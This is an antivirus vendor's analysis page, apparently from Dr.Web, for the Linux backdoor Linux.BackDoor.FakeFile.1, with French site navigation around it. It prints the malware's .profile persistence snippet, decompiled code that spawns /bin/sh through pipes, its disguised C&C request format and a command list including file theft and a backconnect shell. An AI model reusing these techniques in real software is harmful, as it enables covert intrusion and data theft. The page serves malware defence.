Protégez votre univers

Nos autres ressources

  • free.drweb.fr — utilitaires gratuits, plugins, widgets
  • av-desk.com — service Internet pour les prestataires de services Dr.Web AV-Desk
  • curenet.drweb.com — l'utilitaire de désinfection réseau Dr.Web CureNet!
Fermer

Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Linux.BackDoor.FakeFile.1

Added to the Dr.Web virus database: 2016-10-14

Virus description added:

SHA1:

  • 0138fc4d50c734e288388f7c8cbbea5e2ad08a8b

A backdoor for Linux. Upon launching, it copies itself to the file

<HOME>/.gconf/apps/gnome-common/gnome-common

It then searches for a hidden file, whose name matches the file name of the Trojan, and replaces the executable file with it. For instance, if an ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan will search for a hidden file under the name .AnyName.pdf and then replace the original file with it by using the command mv.

If the file is found, the Trojan opens the respective application to view the file:

Extensionapplication
".doc .DOC .xls. XLS .ppt .PPT .docx .DOCX .xlsx .XLSX .pptx .PPTX .odt .ODT .ods .ODS .odp .ODP"soffice
".pdf .PDF"evince
the rest isgedit

If the file is absent, the Trojan creates it and opens in the program gedit. The Trojan then checks the name of the Linux distribution installed on the device: if the name is something other than openSUSE, Linux.BackDoor.FakeFile.1 writes the following strings to the file <HOME>/.profile or the file <HOME>/.bash_profile:

# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
    "$HOME/.gconf/apps/gnome-common/gnome-common"
fi

The program for viewing the file and the its own copy is launched as follows:

pipe(v32);
pipe(v31);
status = fork();
if ( !status )
{
  close(0);
  dup(v31[0]);
  close(1);
  dup(v32[1]);
  close(2);
  dup(v32[1]);
  close(v32[1]);
  close(v31[0]);
  close(v32[0]);
  close(v31[1]);
  sleep(1u);
  while ( execl("/bin/sh", "/bin/sh", 0) < 0 )
    sleep(1u);
  exit(status);
}
v50 = dup(0);
v51 = dup(1);
v52 = dup(2);
close(0);
dup(v32[0]);
close(1);
dup(v31[1]);
close(v31[1]);
close(v32[0]);
close(v31[0]);
close(v32[1]);
write(1, s1, strlen(s1));
write(1, &unk_8053D40, 1u);

If the Trojan is launched from the folder <home>/.gconf/apps/gnome-common/gnome-common, it retrieves the configuration data from its file and decrypts it. After that, the malware program launches two threads: the first shares information with the command and control (C&C) server, and the second monitors the duration of the connection. If the Trojan goes for more than 30 minutes without receiving instructions, the connection is broken. When sharing information with the C&C server, the server’s replies are disguised under HTTP requests that looks as follows:

GET /index.asp?title=Welcome&picture=welcome.gif<encrypted string>
HTTP/1.0
Host: <IP address of a victim>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: * /*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache

Linux.BackDoor.FakeFile.1 can execute the following commands:

NameFunction
RRSend the C&C server the quantity of messages transferred during the session;
DRSend a list of the contents of the specified folder;
DFSend the C&C server the specified file or a folder with all its contents;
D1Delete a file using the command rm –r
D0Delete a file using the command unlink
RFRename a folder;
USRemove itself
RPLaunch a new copy of a process
QQClose the current session
RTEstablish backconnect and run sh
CPTerminate the backdoor’s operation
FFOpen the executable file of the process for writing
COClose the process file
BFCreate a file or folder
FDWrite the transmitted values to a file
EFObtain the directory listing by using the command ls
CXSet 777 privileges on the specified file
CRTerminate backconnect

News about the Trojan

Recommandations pour le traitement


Linux

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série

Editeur russe des solutions antivirus Dr.Web

Expérience dans le développement depuis 1992

Les internautes dans plus de 200 pays utilisent Dr.Web

L'antivirus est fourni en tant que service depuis 2007

Support 24/24

© Doctor Web
2003 — 2019

Doctor Web - éditeur russe des solutions antivirus Dr.Web. Doctor Web développe les produits Dr.Web depuis 1992.

333b, Avenue de Colmar, 67100 Strasbourg